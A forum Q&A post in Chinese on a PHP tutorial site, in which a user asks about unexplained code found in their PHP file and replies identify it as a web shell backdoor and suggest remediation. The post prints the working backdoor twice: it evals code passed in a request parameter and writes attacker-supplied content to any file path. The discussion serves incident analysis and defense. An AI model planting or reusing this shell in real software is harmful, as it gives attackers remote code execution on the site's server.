ホームページ >バックエンド開発 >PHPチュートリアル >PHP文件莫名其妙的被加了代码,看不懂,求解释

PHP文件莫名其妙的被加了代码,看不懂,求解释

WBOY
WBOYオリジナル
2016-06-06 20:50:301088ブラウズ

<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>

回复内容:

<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>

你的网站应该被入侵了。
eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。

第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。

请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
杀毒。

这是一句话木马。

这就是一句话后门,一眼就看出来了,eval接受的参数可以用来攻击哦!

网站代码、数据目录 “可执行不可写,可写不可执行”,改改权限

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。